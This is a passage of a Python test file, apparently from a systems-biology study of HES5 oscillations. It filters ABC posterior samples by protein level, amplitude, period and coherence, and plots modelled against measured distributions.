# plt.gca().set_xlim(1,200)
# plt.gca().set_ylim(0,0.35)
# plt.gca().set_xlim(2,6)
plt.gca().locator_params(axis='x', tight = True, nbins=3)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
# plt.yticks([])
plt.tight_layout(w_pad = 0.0001)
# plt.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','agnostic_inference' + option + '.pdf'))
def xest_plot_amplitude_distribution(self):
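"""Compare the modelled distribution of the standard deviation/mean
statistic against measured single-cell values (hard-coded below)
for one of several acceptance criteria."""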
option = 'lower_amplitude'
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
measured_data = [0.115751936, 0.09571043, 0.070593436, 0.074172953, 0.079566358, 0.04600834,
0.079873319, 0.097029606, 0.084070369, 0.105528875, 0.12579082, 0.042329269,
0.064591498, 0.059602288, 0.057944518, 0.051163091, 0.058111095, 0.102434224,
0.080997961, 0.070390139, 0.047127818, 0.095665455, 0.048707284, 0.083330235,
0.072446835, 0.059289326, 0.175901785, 0.08870091, 0.060774517, 0.119311781,
0.071923541, 0.106271586, 0.063191815, 0.068603169, 0.051063533, 0.074326763,
0.030455154, 0.09777155, 0.07789995, 0.052264432, 0.107642115, 0.078060039,
0.053932836, 0.04064868, 0.080203462, 0.102682858, 0.085553023, 0.050921194,
0.107150422, 0.075111352, 0.085250494, 0.06022623, 0.055863624, 0.070855159,
0.072975538, 0.038283748, 0.05842959, 0.069960347, 0.075625282, 0.033601918,
0.10112012, 0.069907351, 0.047498028, 0.054963426, 0.015357264, 0.091893038,
0.030862283, 0.012518025, 0.038223482, 0.05825977, 0.072195839, 0.020020349,
0.05988876, 0.054678433, 0.08156298, 0.075856751, 0.080105646, 0.084244903,
0.060850253, 0.079889701, 0.114204526, 0.048641408, 0.087017989, 0.072664986,
0.135295363, 0.044380981, 0.024025198, 0.068262356, 0.019802578, 0.064603775,
0.076865303, 0.083760066, 0.059606547, 0.05627585, 0.050701138, 0.064442271,
0.073845055, 0.086630591, 0.034115231, 0.036910128, 0.05845354, 0.055185653,
0.081778966, 0.041642038, 0.032706612, 0.034264942, 0.076971854, 0.046987517,
0.060216471, 0.091438729, 0.0341048, 0.072119114, 0.050266261, 0.076173687,
0.059316138, 0.07362588, 0.043229577, 0.056437502, 0.042911643, 0.072583345,
0.069809296, 0.063362361, 0.051916029, 0.042110911, 0.071238566, 0.069599676,
0.056064602, 0.055051899, 0.063226639, 0.076379692, 0.158771206, 0.037536219,
0.055238055, 0.074217076, 0.094215882, 0.057284261, 0.066521902, 0.075479027,
0.0921231, 0.078040383, 0.07767914, 0.053502299, 0.083650072, 0.084202846,
0.065188768, 0.057116998, 0.079006745, 0.058366725, 0.062152612, 0.062281059,
0.036391176, 0.079608123, 0.05814215, 0.084222668, 0.071304801, 0.09422804,
0.106918005, 0.110727013, 0.10753385, 0.078788611, 0.07298067, 0.078655859,
0.045046025, 0.061084624, 0.085156637, 0.109648343, 0.06425073, 0.096245619,
0.056215123, 0.085664518, 0.066525248, 0.088294766, 0.055145696, 0.075250338,
0.04822837, 0.019409385, 0.047170987, 0.030422279, 0.0818539, 0.07351729,
0.083877723]
if option == 'prior':
accepted_indices = (range(len(prior_samples)),)
elif option == 'mean':
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
model_results[:,0]<65000)) #protein_number
elif option == 'full':
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# prior_samples[:,-1]<20))))) #noise strength
elif option == 'oscillating':
accepted_indices = np.where(model_results[:,3]>0.3) #coherence
elif option == 'mean_and_oscillating':
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000,
model_results[:,3]>0.3))) #coherence
elif option == 'mean_and_period':
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000,
np.logical_and(model_results[:,2]>240, #period
model_results[:,2]<300)))) #period
elif option == 'mean_and_period_and_coherence':
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000,
np.logical_and(model_results[:,2]>240, #period
np.logical_and(model_results[:,2]<300, #period
model_results[:,3]>0.3))))) #coherence
elif option == 'lower_amplitude':
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
model_results[:,1]>0.05))) #standard deviation
elif option == 'agnostic_prior':
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_agnostic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = (range(len(prior_samples)),)
elif option == 'agnostic_mean':
saving_path = os.path.join(os.path.dirname(__file__), 'output',
'sampling_results_agnostic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
model_results[:,0]<65000)) #protein_number
elif option == 'agnostic_mean_and_coherence':
saving_path = os.path.join(os.path.dirname(__file__), 'output',
'sampling_results_agnostic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000,
model_results[:,3]>0.3))) #coherence
elif option == 'not_oscillating':
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
np.logical_and(model_results[:,1]>0.05,
model_results[:,3]<0.1))))) #coherence
else:
raise ValueError('could not identify posterior option')
my_posterior_samples = prior_samples[accepted_indices]
print('number of posterior samples is')
print(len(my_posterior_samples))
my_model_results = model_results[accepted_indices]
my_posterior_samples[:,2]/=10000
sns.set()
# sns.set(font_scale = 1.5)
# sns.set(font_scale = 1.3, rc = {'ytick.labelsize': 6})
# font = {'size' : 28}
# plt.rc('font', **font)
my_figure = plt.figure(figsize= (4.5,3))
my_figure.add_subplot(211)
# # dataframe = pd.DataFrame({'Model': all_periods,
# 'Data' : np.array(real_data)*60})
all_standard_deviations = my_model_results[:,1]
plt.axvline(np.mean(all_standard_deviations))
sns.distplot(all_standard_deviations,
kde = False,
rug = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
)
# bins = 20)
# plt.gca().set_xlim(-1,2)
plt.ylabel("Likelihood", labelpad = 20)
plt.xlabel("Standard deviation/mean HES5")
plt.xlim(0,0.25)
# plt.ylim(0,0.5)
plt.gca().locator_params(axis='y', tight = True, nbins=3)
# plt.gca().locator_params(axis='y', tight = True, nbins=2, labelsize = 'small')
# plt.gca().set_ylim(0,1.0)
# plt.xticks([-1,0,1,2], [r'$10^{-1}$',r'$10^0$',r'$10^1$',r'$10^2$'])
# plt.yticks([])
my_figure.add_subplot(212)
sns.distplot(measured_data,
kde = False,
rug = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
)
plt.ylabel("Likelihood", labelpad = 20)
plt.xlabel("Standard deviation/mean HES5")
plt.axvline(np.mean(measured_data))
print('maximal measured value')
print(np.max(measured_data))
plt.xlim(0,0.25)
# plt.ylim(0,0.5)
plt.gca().locator_params(axis='y', tight = True, nbins=3)
# plt.gca().locator_params(axis='y', tight = True, nbins=2, labelsize = 'small')
# plt.gca().set_ylim(0,1.0)
# plt.xticks([-1,0,1,2], [r'$10^{-1}$',r'$10^0$',r'$10^1$',r'$10^2$'])
# plt.yticks([])
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','abc_standard_deviation_' + option + '.pdf'))
my_boxplot_figure = plt.figure(figsize = [4,2.5])
sns.boxplot(data = [all_standard_deviations, measured_data])
plt.xticks([0,1], ['Model', 'Experiment'])
plt.ylabel('Standard deviation/mean HES5')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','abc_standard_deviation_boxplot_' + option + '.pdf'))
def xest_plot_period_distribution_boxplot(self):
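"""Box-plot comparison of modelled periods (below 600 min) against
measured periods (hard-coded below, in hours)."""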
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_narrowed')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
my_model_results = model_results[accepted_indices]
real_data = [ 6.4135025721, 6.9483225932, 2.6887457703, 3.8620874625, 3.2559540745,
4.4568030424, 5.2120783369, 4.3169191105, 4.2472576997, 2.7684001434,
3.6331949226, 5.365000329, 1.1181243755, 4.2130976958, 6.3381760719,
2.466899605, 4.7849990718, 5.2029517316, 4.2038143391, 3.9909362984,
3.2734490618, 4.3116631965, 5.3199423883]
## the values that Veronica sent initially
#
# real_data = [2.0075009033, 5.1156200644, 7.7786868129, 6.4328452748, 7.441794935,
# 7.0127707313, 2.6890681359, 3.4454911902, 3.8689181126, 3.2493764293,
# 6.3817264371, 5.8903734106, 4.5034984657, 3.4247641996, 4.4767623623,
# 4.1803337503, 5.2752672662, 6.9038758003, 4.3200156205, 4.2588402084,
# 6.1428930891, 5.4124817274, 5.0135377758, 2.8156245427, 5.5008033408,
# 3.6331974295, 5.295813407, 1.1181243876, 5.5984263674, 4.2800118281,
# 6.7713656265, 3.4585300534, 6.3727670575, 2.4668994841, 6.3725171059,
# 4.8021898758, 4.8108333392, 5.9935335349, 6.2570622822, 5.2284704987,
# 4.2143881493, 4.0659270434, 3.9990674449, 4.4410420437, 6.7406002947,
# 5.0648853886, 1.8765732885, 3.307425174, 5.6208186717, 4.3185605778,
# 5.186842823, 5.6310823986, 7.4402931009]
sns.set(font_scale = 1.5)
font = {'size' : 28}
plt.rc('font', **font)
all_periods = my_model_results[:,2]
# # dataframe = pd.DataFrame({'Model': all_periods,
# 'Data' : np.array(real_data)*60})
# print('mean period is')
# print(np.mode(all_periods[all_periods<600]))
# import pdb; pdb.set_trace()
my_figure = plt.figure(figsize= (5,3))
sns.boxplot(data = [all_periods[all_periods<600], np.array(real_data)*60])
plt.xticks([0,1], ['Model', 'Experiment'])
plt.ylabel('Period [min]')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','abc_period_distribution_for_paper.pdf'))
def xest_plot_agnostic_period_distribution(self):
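"""Histogram of modelled periods for the agnostic-noise posterior,
with the mean measured period marked by a vertical line."""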
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_agnostic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# prior_samples[:,-1]<20))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
my_model_results = model_results[accepted_indices]
real_data = [ 6.4135025721, 6.9483225932, 2.6887457703, 3.8620874625, 3.2559540745,
4.4568030424, 5.2120783369, 4.3169191105, 4.2472576997, 2.7684001434,
3.6331949226, 5.365000329, 1.1181243755, 4.2130976958, 6.3381760719,
2.466899605, 4.7849990718, 5.2029517316, 4.2038143391, 3.9909362984,
3.2734490618, 4.3116631965, 5.3199423883]
## the values that Veronica sent initially
#
# real_data = [2.0075009033, 5.1156200644, 7.7786868129, 6.4328452748, 7.441794935,
# 7.0127707313, 2.6890681359, 3.4454911902, 3.8689181126, 3.2493764293,
# 6.3817264371, 5.8903734106, 4.5034984657, 3.4247641996, 4.4767623623,
# 4.1803337503, 5.2752672662, 6.9038758003, 4.3200156205, 4.2588402084,
# 6.1428930891, 5.4124817274, 5.0135377758, 2.8156245427, 5.5008033408,
# 3.6331974295, 5.295813407, 1.1181243876, 5.5984263674, 4.2800118281,
# 6.7713656265, 3.4585300534, 6.3727670575, 2.4668994841, 6.3725171059,
# 4.8021898758, 4.8108333392, 5.9935335349, 6.2570622822, 5.2284704987,
# 4.2143881493, 4.0659270434, 3.9990674449, 4.4410420437, 6.7406002947,
# 5.0648853886, 1.8765732885, 3.307425174, 5.6208186717, 4.3185605778,
# 5.186842823, 5.6310823986, 7.4402931009]
my_posterior_samples[:,2]/=10000
real_data = np.array(real_data)*60
sns.set(font_scale = 1.5)
# sns.set(font_scale = 1.3, rc = {'ytick.labelsize': 6})
font = {'size' : 28}
plt.rc('font', **font)
my_figure = plt.figure(figsize= (4.5,2.5))
# # dataframe = pd.DataFrame({'Model': all_periods,
# 'Data' : np.array(real_data)*60})
all_periods = my_model_results[:,2]/60
sns.distplot(all_periods[all_periods<10],
kde = False,
rug = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
bins = 10)
# plt.gca().set_xlim(-1,2)
plt.axvline(np.mean(real_data)/60)
plt.ylabel("Likelihood", labelpad = 20)
plt.xlabel("Modelled period [h]")
plt.xlim(1,10)
plt.ylim(0,0.5)
plt.gca().locator_params(axis='y', tight = True, nbins=3)
# plt.gca().locator_params(axis='y', tight = True, nbins=2, labelsize = 'small')
# plt.gca().set_ylim(0,1.0)
# plt.xticks([-1,0,1,2], [r'$10^{-1}$',r'$10^0$',r'$10^1$',r'$10^2$'])
# plt.yticks([])
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','abc_period_distribution_agnostic.pdf'))
def xest_plot_period_distribution_for_paper(self):
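"""Histogram of modelled periods for the extended posterior; prints
the mean, median, and histogram mode beforehand."""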
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
# accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
# model_results[:,0]<65000)) #standard deviation
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
model_results[:,1]>0.05))) #standard deviation
# accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
# np.logical_and(model_results[:,0]<65000, #protein_number
# np.logical_and(model_results[:,1]<0.15, #standard deviation
# model_results[:,1]>0.05)))) #standard deviation
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3)))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
my_model_results = model_results[accepted_indices]
real_data = [ 6.4135025721, 6.9483225932, 2.6887457703, 3.8620874625, 3.2559540745,
4.4568030424, 5.2120783369, 4.3169191105, 4.2472576997, 2.7684001434,
3.6331949226, 5.365000329, 1.1181243755, 4.2130976958, 6.3381760719,
2.466899605, 4.7849990718, 5.2029517316, 4.2038143391, 3.9909362984,
3.2734490618, 4.3116631965, 5.3199423883]
## the values that Veronica sent initially
#
# real_data = [2.0075009033, 5.1156200644, 7.7786868129, 6.4328452748, 7.441794935,
# 7.0127707313, 2.6890681359, 3.4454911902, 3.8689181126, 3.2493764293,
# 6.3817264371, 5.8903734106, 4.5034984657, 3.4247641996, 4.4767623623,
# 4.1803337503, 5.2752672662, 6.9038758003, 4.3200156205, 4.2588402084,
# 6.1428930891, 5.4124817274, 5.0135377758, 2.8156245427, 5.5008033408,
# 3.6331974295, 5.295813407, 1.1181243876, 5.5984263674, 4.2800118281,
# 6.7713656265, 3.4585300534, 6.3727670575, 2.4668994841, 6.3725171059,
# 4.8021898758, 4.8108333392, 5.9935335349, 6.2570622822, 5.2284704987,
# 4.2143881493, 4.0659270434, 3.9990674449, 4.4410420437, 6.7406002947,
# 5.0648853886, 1.8765732885, 3.307425174, 5.6208186717, 4.3185605778,
# 5.186842823, 5.6310823986, 7.4402931009]
my_posterior_samples[:,2]/=10000
real_data = np.array(real_data)*60
sns.set()
# sns.set(font_scale = 1.5)
# sns.set(font_scale = 1.3, rc = {'ytick.labelsize': 6})
# font = {'size' : 28}
# plt.rc('font', **font)
my_figure = plt.figure(figsize= (4.5,2.5))
# # dataframe = pd.DataFrame({'Model': all_periods,
# 'Data' : np.array(real_data)*60})
all_periods = my_model_results[:,2]/60
print('mean is')
print(np.mean(all_periods[all_periods<10]))
print('median is')
print(np.median(all_periods[all_periods<10]))
print('data mean is')
print(np.mean(real_data)/60)
period_histogram, bins = np.histogram(all_periods[all_periods<10], bins = 400)
maximum_index = np.argmax(period_histogram)
print('max bin is')
print(bins[maximum_index])
print(bins[maximum_index+1])
print(bins[maximum_index+2])
print(bins[maximum_index-1])
sns.distplot(all_periods[all_periods<10],
kde = False,
rug = False,
norm_hist = True,
hist_kws = {'edgecolor' : 'black'},
bins = 10)
# plt.gca().set_xlim(-1,2)
plt.axvline(np.mean(real_data)/60)
plt.ylabel("Likelihood", labelpad = 20)
plt.xlabel("Modelled period [h]")
plt.xlim(1,10)
# plt.ylim(0,0.8)
plt.gca().locator_params(axis='y', tight = True, nbins=3)
# plt.gca().locator_params(axis='y', tight = True, nbins=2, labelsize = 'small')
# plt.gca().set_ylim(0,1.0)
# plt.xticks([-1,0,1,2], [r'$10^{-1}$',r'$10^0$',r'$10^1$',r'$10^2$'])
# plt.yticks([])
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','abc_period_distribution_for_paper.pdf'))
def xest_plot_agnostic_mrna_distribution(self):
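"""Histogram of mean mRNA numbers (model_results column 4) for the
coherent part of the agnostic-noise posterior."""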
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_agnostic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
# model_results[:,1]>0.05))) #standard deviation
np.logical_and(model_results[:,1]>0.05, #standard deviation
model_results[:,3]>0.3)))) #coherence
# np.logical_and(model_results[:,1]<0.15, #standard deviation
# model_results[:,1]>0.05)))) #standard deviation
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# prior_samples[:,-1]<20))))) #time_delay
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
my_model_results = model_results[accepted_indices]
my_posterior_samples[:,2] /= 10000
sns.set()
# sns.set(font_scale = 1.5)
# sns.set(font_scale = 1.3, rc = {'ytick.labelsize': 6})
# font = {'size' : 28}
# plt.rc('font', **font)
my_figure = plt.figure(figsize= (4.5,2.5))
# # dataframe = pd.DataFrame({'Model': all_periods,
# 'Data' : np.array(real_data)*60})
all_mrna = my_model_results[:,4]
sns.distplot(all_mrna,
kde = False,
rug = False,
hist_kws = {'edgecolor' : 'black'},
norm_hist = True)
# norm_hist = True,
# bins = 10)
# plt.gca().set_xlim(-1,2)
plt.ylabel("Likelihood" )
plt.xlabel("mean mRNA number")
# plt.xlim(1,80)
# plt.ylim(0,0.06)
# plt.ylim(0,0.5)
plt.gca().locator_params(axis='y', tight = True, nbins=3)
# plt.gca().locator_params(axis='y', tight = True, nbins=2, labelsize = 'small')
# plt.gca().set_ylim(0,1.0)
# plt.xticks([-1,0,1,2], [r'$10^{-1}$',r'$10^0$',r'$10^1$',r'$10^2$'])
# plt.yticks([])
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','abc_mrna_distribution_agnostic.pdf'))
def xest_plot_agnostic_noise_amplitude_correlation(self):
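"""Scatter the noise strength against the standard deviation/mean
statistic across the agnostic-noise posterior."""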
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_agnostic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
my_model_results = model_results[accepted_indices]
my_figure = plt.figure(figsize= (4.5,2.5))
plt.scatter(my_posterior_samples[:,-1],my_model_results[:,1], lw = 0, s = 1, zorder = 0, alpha = 0.2)
plt.gca().set_rasterization_zorder(1)
plt.xlabel('Noise strength [1/min]')
plt.ylabel('std/mean')
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','agnostic_noise_vs_amplitude.pdf'),dpi = 400)
def xest_plot_mrna_distribution_for_paper(self):
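"""Histogram of mean mRNA numbers for the extended posterior; also
prints any samples with unusually high (>200) mRNA counts."""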
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
model_results[:,1]>0.05))) #standard deviation
# model_results[:,1]>0.05)))) #standard deviation
# np.logical_and(model_results[:,1]<0.15, #standard deviation
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
my_model_results = model_results[accepted_indices]
my_posterior_samples[:,2] /= 10000
weird_index = np.where(my_model_results[:,4]>200)
weird_results = my_model_results[weird_index]
weird_posterior = my_posterior_samples[weird_index]
print(weird_results)
print(weird_posterior)
sns.set()
# sns.set(font_scale = 1.5)
# sns.set(font_scale = 1.3, rc = {'ytick.labelsize': 6})
# font = {'size' : 28}
# plt.rc('font', **font)
my_figure = plt.figure(figsize= (4.5,2.5))
# # dataframe = pd.DataFrame({'Model': all_periods,
# 'Data' : np.array(real_data)*60})
all_mrna = my_model_results[:,4]
print('minimum and maximum are')
print(np.min(all_mrna))
print(np.max(all_mrna))
print('number of samples above 100 is')
print(np.sum(all_mrna>100))
mrna_histogram, bins = np.histogram(all_mrna, bins = 400)
maximum_index = np.argmax(mrna_histogram)
print('max bin is')
print(bins[maximum_index])
print(bins[maximum_index+1])
print(bins[maximum_index+2])
print(bins[maximum_index-1])
# sns.distplot(all_mrna[all_mrna<80],
sns.distplot(all_mrna,
kde = False,
rug = False,
hist_kws = {'edgecolor' : 'black'},
norm_hist = True,
# norm_hist = True,
bins = 100)
# plt.gca().set_xlim(-1,2)
plt.ylabel("Likelihood" )
plt.xlabel("mean mRNA number")
plt.xlim(0,100)
plt.ylim(0,0.06)
# plt.ylim(0,0.5)
plt.gca().locator_params(axis='y', tight = True, nbins=3)
# plt.gca().locator_params(axis='y', tight = True, nbins=2, labelsize = 'small')
# plt.gca().set_ylim(0,1.0)
# plt.xticks([-1,0,1,2], [r'$10^{-1}$',r'$10^0$',r'$10^1$',r'$10^2$'])
# plt.yticks([])
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','abc_mrna_distribution_for_paper.pdf'))
def xest_plot_period_distribution_differently(self):
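"""Plot modelled and measured period distributions as two stacked
histograms rather than as a box plot."""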
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_narrowed')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.1)))))
my_posterior_samples = prior_samples[accepted_indices]
my_model_results = model_results[accepted_indices]
real_data = [ 6.4135025721, 6.9483225932, 2.6887457703, 3.8620874625, 3.2559540745,
4.4568030424, 5.2120783369, 4.3169191105, 4.2472576997, 2.7684001434,
3.6331949226, 5.365000329, 1.1181243755, 4.2130976958, 6.3381760719,
2.466899605, 4.7849990718, 5.2029517316, 4.2038143391, 3.9909362984,
3.2734490618, 4.3116631965, 5.3199423883]
## the values that Veronica sent initially
#
# real_data = [2.0075009033, 5.1156200644, 7.7786868129, 6.4328452748, 7.441794935,
# 7.0127707313, 2.6890681359, 3.4454911902, 3.8689181126, 3.2493764293,
# 6.3817264371, 5.8903734106, 4.5034984657, 3.4247641996, 4.4767623623,
# 4.1803337503, 5.2752672662, 6.9038758003, 4.3200156205, 4.2588402084,
# 6.1428930891, 5.4124817274, 5.0135377758, 2.8156245427, 5.5008033408,
# 3.6331974295, 5.295813407, 1.1181243876, 5.5984263674, 4.2800118281,
# 6.7713656265, 3.4585300534, 6.3727670575, 2.4668994841, 6.3725171059,
# 4.8021898758, 4.8108333392, 5.9935335349, 6.2570622822, 5.2284704987,
# 4.2143881493, 4.0659270434, 3.9990674449, 4.4410420437, 6.7406002947,
# 5.0648853886, 1.8765732885, 3.307425174, 5.6208186717, 4.3185605778,
# 5.186842823, 5.6310823986, 7.4402931009]
my_posterior_samples[:,2]/=10000
real_data = np.array(real_data)*60
sns.set(font_scale = 1.5)
# sns.set(font_scale = 1.3, rc = {'ytick.labelsize': 6})
font = {'size' : 28}
plt.rc('font', **font)
my_figure = plt.figure(figsize= (6,4))
# # dataframe = pd.DataFrame({'Model': all_periods,
# 'Data' : np.array(real_data)*60})
all_periods = my_model_results[:,2]
my_figure.add_subplot(211)
sns.distplot(all_periods[all_periods<600],
kde = False,
rug = False,
norm_hist = True,
bins = 10)
# plt.gca().set_xlim(-1,2)
plt.axvline(np.mean(real_data))
plt.ylabel("Likelihood", labelpad = 20)
plt.xlabel("Modelled period [min]")
plt.xlim(50,600)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
# plt.gca().locator_params(axis='y', tight = True, nbins=2, labelsize = 'small')
# plt.gca().set_ylim(0,1.0)
# plt.xticks([-1,0,1,2], [r'$10^{-1}$',r'$10^0$',r'$10^1$',r'$10^2$'])
# plt.yticks([])
my_figure.add_subplot(212)
sns.distplot(real_data,
kde = False,
rug = False,
norm_hist = True)
# plt.gca().set_xscale("log")
# plt.gca().set_xlim(1,200)
# plt.gca().set_xlim(0,2.3)
# plt.gca().set_ylim(0,2.0)
plt.gca().locator_params(axis='y', tight = True, nbins=2)
# plt.xticks([0,1,2], [r'$10^0$',r'$10^1$',r'$10^2$'])
plt.xlabel("Measured period [min]")
plt.ylabel("Occurrence", labelpad = 20)
plt.xlim(50,600)
# plt.yticks([])
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','abc_period_distribution_differently.pdf'))
def xest_plot_mrna_distribution_for_paper_narrowed(self):
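"""Histogram of mean mRNA numbers for the narrowed posterior."""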
saving_path = os.path.join(os.path.dirname(__file__), 'data',
'sampling_results_narrowed')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
my_model_results = model_results[accepted_indices]
sns.set(font_scale = 1.5)
font = {'size' : 28}
plt.rc('font', **font)
all_mrna_levels = my_model_results[:,4]
# # dataframe = pd.DataFrame({'Model': all_periods,
# 'Data' : np.array(real_data)*60})
my_figure = plt.figure(figsize= (5,3))
sns.distplot(all_mrna_levels,
kde = False,
rug = False,
norm_hist = True)
# plt.xticks([0,1], ['Model', 'Experiment'])
plt.xlabel('<mRNA>')
plt.ylabel('Likelihood')
plt.gca().locator_params(axis='y', tight = True, nbins=3)
plt.ylim(0,0.05)
plt.tight_layout()
plt.savefig(os.path.join(os.path.dirname(__file__),
'output','abc_mrna_distribution_for_paper.pdf'))
def xest_make_relative_delay_parameter_variation(self):
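"""Run a relative parameter sweep in the transcriptional time delay
at the first ten accepted posterior samples and save the results."""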
number_of_parameter_points = 20
number_of_trajectories = 200
# number_of_parameter_points = 3
# number_of_trajectories = 2
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'data','sampling_results_extended')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #protein number
np.logical_and(model_results[:,0]<65000, #protein_number
# np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05))) #standard deviation
my_posterior_samples = prior_samples[accepted_indices]
print('number of accepted samples is')
print(len(my_posterior_samples))
my_posterior_samples = my_posterior_samples[:10]
my_parameter_sweep_results = hes5.conduct_parameter_sweep_at_parameters('time_delay',
my_posterior_samples,
number_of_parameter_points,
number_of_trajectories,
relative = True)
np.save(os.path.join(os.path.dirname(__file__), 'output','extended_relative_sweeps_' + 'time_delay' + '.npy'),
my_parameter_sweep_results)
def xest_make_amplitude_plot(self):
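"""Plot the COV response to protein degradation; columns 2 and 7 of
each sweep results table are assumed to hold the stochastic and
deterministic COV, respectively."""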
sns.set_style({"xtick.direction": "in","ytick.direction": "in"})
parameter_names = ['protein_degradation_rate']
x_labels = dict()
x_labels['protein_degradation_rate'] = 'rel. Protein degradation'
